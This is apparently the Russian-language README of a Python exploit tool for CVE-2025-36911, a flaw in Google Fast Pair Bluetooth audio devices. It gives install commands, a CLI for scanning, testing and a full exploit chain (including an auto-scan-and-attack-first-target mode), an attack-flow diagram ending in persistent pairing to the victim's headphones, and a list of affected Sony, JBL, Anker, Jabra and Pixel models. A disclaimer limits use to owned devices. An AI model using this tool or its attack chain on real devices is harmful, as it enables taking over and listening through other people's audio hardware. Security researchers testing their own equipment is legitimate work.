
Эксплойт уязвимости CVE-2025-36911 на Python для тестирования собственного оборудования
Быстрый инструмент эксплуатации CVE-2025-36911 для проверки нашего оборудования на Python
Автор: Sébastien Dudek (@FlUxIuS) @ Penthertz Благодарности: whisperpair.eu за обнаружение уязвимости и этому отличному APK от @ZalexDev, который сократил время реализации wpair-app
Только для авторизованных исследований в области безопасности. Тестируйте только на устройствах, которые вам принадлежат.
CVE-2025-36911 затрагивает реализации Google Fast Pair на миллионах Bluetooth-аудиоустройств.
Нормальное поведение: Устройства должны принимать запросы на сопряжение только в режиме сопряжения (зажатая кнопка, открытый кейс и т. д.)
Уязвимое поведение: Устройства принимают запросы Key-Based Pairing (KBP) в любое время, даже в режиме ожидания или при уже выполненном сопряжении.
# Install
pip install bleak cryptography
git clone https://github.com/Penthertz/CVE-2025-36911-exploit.git
cd CVE-2025-36911-exploit
# Scan for targets
python3 whisperpair-cli.py scan
# Test if vulnerable
python3 whisperpair-cli.py test AA:BB:CC:DD:EE:FF
# Exploit
python3 whisperpair-cli.py exploit --quick
┌─────────────────────────────────────────────────────────────┐
│ ATTACKER VULNERABLE DEVICE │
│ │
│ 1. BLE Scan ─────────────────────► Fast Pair Advertisement │
│ (Find target) (Model ID visible) │
│ │
│ 2. Connect ──────────────────────► GATT Connection │
│ │
│ 3. KBP Request ──────────────────► Key-Based Pairing Char │
│ (Should be rejected ✗ NOT REJECTED! │
│ when not in pairing mode) (CVE-2025-36911) │
│ │
│ 4. Parse Response ◄────────────── BR/EDR Address │
│ │
│ 5. Write Account Key ────────────► Account Key Char │
│ (Persistent access) ✓ ACCEPTED │
│ │
│ 6. Classic BT Pair ──────────────► Audio Profiles (A2DP) │
│ (Game over) │
└─────────────────────────────────────────────────────────────┘
Инструмент автоматически перебирает несколько стратегий:
Дополнительная информация здесь
Проверено, уязвимы (следите за обновлениями прошивки):
| Команда | Описание |
|---|
scan | BLE-скан устройств Fast Pair с обновлением в реальном времени |
scan -a | Сканировать все BLE-устройства |
info <addr> | Показать GATT-сервисы/характеристики |
test <addr> | Неинвазивная проверка уязвимости |
exploit <addr> | Полная цепочка эксплуатации |
exploit -q | Автосканирование + эксплуатация первой цели |
| Бренд | Модели |
|---|
| Pixel Buds Pro 2 (но быстро получают обновления с Pixel-фонами) | |
| Sony | WH-1000XM4, WH-1000XM5/XM6, LinkBuds S, WH-CH520 |
| JBL | JBL TUNE BEAM |
| Anker | Soundcore Liberty 4 NC |
| Jabra | Elite 8 Active |
| + многие другие | whisperpair.eu |